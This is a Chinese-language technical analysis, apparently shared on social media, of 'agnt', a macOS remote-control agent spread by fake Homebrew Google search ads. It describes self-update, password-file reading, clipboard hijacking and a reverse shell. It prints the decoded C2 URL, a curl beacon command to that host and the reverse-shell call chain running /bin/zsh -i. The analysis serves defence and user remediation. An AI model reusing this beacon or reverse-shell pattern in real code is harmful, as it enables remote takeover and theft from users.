假冒Homebrew谷歌广告钓鱼诱导安装的恶意程序agnt技术分析

结论：agnt 是完整 C2 agent, 不是单纯剪贴板读取器。我在 IDA 里确认到这些核心行为：·启动后初始化 ~/.hlpr 相关路径，默认每 10s 轮询一次 C2。·C2 地址被 XOR 混淆，解出来是：https://owqkoqoqooqogqoqgoo.info/api/agnt ·它用 popen() 跑：curl --fail --header "Content-Type: text/plain" --data "" https://.../api/agnt ·它支持 0-10 号任务：·0/1:自更新，把 C2 给的新二进制写到 .upd，加执行权限，rename 覆盖 .agnt，然后 execve 重启。·2:设置/写入 .guid。·3:读取 .ownrid。·4:读取密码类文件，IDA 里路径解出来是 .passwd，与你看到的 pass 属于同一类本地口令文件逻辑。·5:执行并回传 system_profiler -json SPSoftwareDataType SPHardwareDataType。·6/7/8/9:管理反连 shell。·10:下发剪贴板劫持规则。最重的一点：它确实有反连交互 shell。函数 0x1000043C8 会 getaddrinfo -> socket -> connect -> fork -> setsid -> dup2(sock,0/1/2) -> execve 。XOR 解码后执行的是：/bin/zsh -i 也就是说 C2 如果下发对应任务，它能让攻击者拿到当前用户权限的交互式 zsh。剪贴板部分也确认了：后台线程每 25ms 读一次 NSPasteboard 字符串；如果匹配 C2 下发的 regex 规则，就 clearContents 并 setString:forType: 替换剪贴板内容。这是剪贴板劫持，不只是读取。关于 Chrome / Proton / Keychain: 在 agnt 里我没有看到固定的 Chrome、Login Data、Cookies、Proton、Keychain、SecItem、sqlite、id_rsa 明文路径或专用导入；也没有看到直接调用 macOS Keychain API 的证据。但因为它有反连 shell 和自更新能力，所以不能据此说“它不可能拿浏览器/SSH/Proton”。只能说：agnt 本体没有硬编码的Chrome/Proton/Keychain 采集器，风险来自 C2 下发任务和反连 shell。处置含义：这不能按“只改 Mac 密码”收尾。至少应按“当前用户权限曾被远控能力覆盖”处理；无 passphrase 的 SSH key 建议立即轮换。Google/Proton/Chrome 同步密码是否全量轮换，取决于你愿意承担多少风险，但退出所有会话/撤销可疑 session 是很合理的下限。

该图片是社交媒体发布的恶意程序技术分析截图，内容为针对伪装成谷歌搜索Homebrew结果的钓鱼页面诱导用户安装的恶意程序agnt的逆向分析结论：1、确认agnt是完整的C2远控木马，并非单纯的剪贴板读取工具，启动后会初始化相关路径，每10秒轮询一次C2服务器，C2地址经XOR混淆解密后为指定域名接口；2、列出该恶意程序支持的0-10号共11项任务，包含自更新、读写标识文件、读取密码类文件、收集Mac软硬件信息、管理反连shell、下发剪贴板劫持规则等；3、验证该程序具备交互式反连shell能力，攻击者可获取当前用户权限的zsh shell，同时会每25毫秒读取一次系统剪贴板，支持按正则规则替换剪贴板内容实现劫持；4、说明该程序本体未硬编码Chrome、密钥链等敏感信息采集逻辑，但存在通过C2下发任务窃取相关数据的风险，同时给出了用户处置建议，指出不能仅通过修改Mac密码处理，建议轮换无密码的SSH密钥、退出可疑会话等。

该内容来源于X.com（原推特）用户雲鳩转发的MilkSU发布的安全预警，预警提示谷歌搜索Homebrew的首个结果若为business.google.com的谷歌广告则属于钓鱼页面，会诱导Mac用户安装上述恶意程序，存在窃取用户钱包、交易相关敏感信息、控制用户设备的风险，该截图为相关恶意程序的技术分析详情。